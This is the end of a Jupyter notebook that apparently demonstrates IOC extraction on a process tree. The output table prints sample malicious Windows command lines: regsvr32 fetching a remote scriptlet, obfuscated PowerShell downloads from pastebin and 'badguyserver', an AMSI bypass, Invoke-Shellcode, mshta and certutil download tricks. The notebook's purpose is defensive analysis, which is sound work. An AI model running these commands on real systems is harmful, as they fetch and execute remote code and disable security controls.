       "16           49   \n",
       "17           67   \n",
       "18           77   \n",
       "19           77   \n",
       "20           78   \n",
       "21           81   \n",
       "22           90   \n",
       "23          102   \n",
       "24          102   \n",
       "\n",
       "                                                                                                  Input  \n",
       "0   cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...  \n",
       "1                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "2                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "3   .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...  \n",
       "4   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "5   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "6                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "7                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "8                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "9                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "10                                                        implant.exe  81ed03caf6901e444c72ac67d192fb9c  \n",
       "11      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "12      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "13  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "14  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "15                                                                   .\\powershell  Invoke-Shellcode.ps1  \n",
       "16                                                            .\\powershell  Invoke-ReverseDnsLookup.ps1  \n",
       "17  cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...  \n",
       "18  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "19  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "20  netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...  \n",
       "21                                           cmd  /c \"powershell wscript.shell used to download a .gif\"  \n",
       "22                                         c:\\Diagnostics\\UserTmp\\ransomware.exe   @ abc.com abc.wallet  \n",
       "23                                                     certutil  -urlcache -split -f http://127.0.0.1/   \n",
       "24                                                     certutil  -urlcache -split -f http://127.0.0.1/   "
      ]
     },
     "execution_count": 23,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "process_tree.mp.ioc_extract(columns=['CommandLine'])"
   ]
  }
 ],
 "metadata": {
  "celltoolbar": "Tags",
  "hide_input": false,
  "interpreter": {
   "hash": "2bc37074a50de3994d4ebdf9197e864a43c9c15c9793b7f9f3363bcff9457253"
  },
  "kernelspec": {
   "display_name": "Python [conda env:condadev] *",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.9.7"
  },
  "latex_envs": {
   "LaTeX_envs_menu_present": true,
   "autoclose": false,
   "autocomplete": true,
   "bibliofile": "biblio.bib",
   "cite_by": "apalike",
   "current_citInitial": 1,
   "eqLabelWithNumbers": true,
   "eqNumInitial": 1,
   "hotkeys": {
    "equation": "Ctrl-E",
    "itemize": "Ctrl-I"
   },
   "labels_anchors": false,
   "latex_user_defs": false,
   "report_style_numbering": false,
   "user_envs_cfg": false
  },
  "toc": {
   "base_numbering": 1,
   "nav_menu": {
    "height": "318.996px",
    "width": "320.994px"
   },
   "number_sections": false,
   "sideBar": true,
   "skip_h1_title": false,
   "title_cell": "Table of Contents",
   "title_sidebar": "Contents",
   "toc_cell": false,
   "toc_position": {
    "height": "calc(100% - 180px)",
    "left": "10px",
    "top": "150px",
    "width": "165px"
   },
   "toc_section_display": true,
   "toc_window_display": true
  },
  "varInspector": {
   "cols": {
    "lenName": 16,
    "lenType": 16,
    "lenVar": 40
   },
   "kernels_config": {
    "python": {
     "delete_cmd_postfix": "",
     "delete_cmd_prefix": "del ",
     "library": "var_list.py",
     "varRefreshCmd": "print(var_dic_list())"
    },
    "r": {
     "delete_cmd_postfix": ") ",
     "delete_cmd_prefix": "rm(",
     "library": "var_list.r",
     "varRefreshCmd": "cat(var_dic_list()) "
    }
   },
   "position": {
    "height": "406.193px",
    "left": "1468.4px",
    "right": "20px",
    "top": "120px",
    "width": "456.572px"
   },
   "types_to_exclude": [
    "module",
    "function",
    "builtin_function_or_method",
    "instance",
    "_Feature"
   ],
   "window_display": false
  },
  "widgets": {
   "application/vnd.jupyter.widget-state+json": {
    "state": {},
    "version_major": 2,
    "version_minor": 0
   }
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}
